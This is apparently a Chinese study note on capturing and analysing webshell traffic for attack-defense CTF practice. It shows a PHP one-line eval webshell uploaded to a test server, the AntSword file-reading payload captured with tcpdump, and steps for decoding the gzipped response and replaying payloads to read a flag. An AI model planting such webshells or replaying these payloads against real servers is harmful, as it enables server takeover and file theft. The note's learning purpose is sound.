1.抓包学习
用tcpdump抓包
tcpdump port 80 -w 1.pcap
用前几天给计网老师搭的上传环境hh
传了一个一句话木马上去
<?php @eval($_POST[value]);?>
包下来了,看一眼
直接追踪流,可以看到这个上传的文件
这个配置出了点小问题,影响不大。
用蚁剑连一下子,再抓一下流量,可以看到这个流量
/www/wwwroot/175.24.78.155/index.html&
value=@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out)
{return $out;};
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "21d6e540e0b3";
echo @asenc($output);
echo "cb3cabef";}
ob_start();
try{
$F=base64_decode(get_magic_quotes_gpc()?stripslashes($_POST["he75a2a982b4fc"]):$_POST["he75a2a982b4fc"])
;$fp=@fopen($F,"r");
if(@fgetc($fp)){
@fclose($fp);@readfile($F);
}
else
{echo
("ERROR:// Can Not Read");};
}catch(Exception $e)
{echo "ERROR://".$e->getMessage();};
asoutput();
die();
url解一下码,可以看到蚁剑是自动做了混淆的,这个还是很有用的。
这个返回包的gzip,是编码过的,直接储存为zip文件再解密就能看到明文了。
把原始数据保存,转16进制
接着把1f8b之前的删掉,再解压就可以了
2.进一步利用的研究
这里是抓取连接一句话木马利用的数据包
像这样的简单的,直接拿过来用就可以了,理解也很好理解
但是想蚁剑那种,做了混淆的应该怎么办呢,我直接把payload copy下来
可以看到,直接成功
但是这个cat flag的包,经过尝试,我并没有成功,是因为路径不一样,蚁剑用的绝对路径,在awd比赛的时候是不存在这种问题滴
不过包里是有flag的
这里面却没有。。。emmm应该问题不大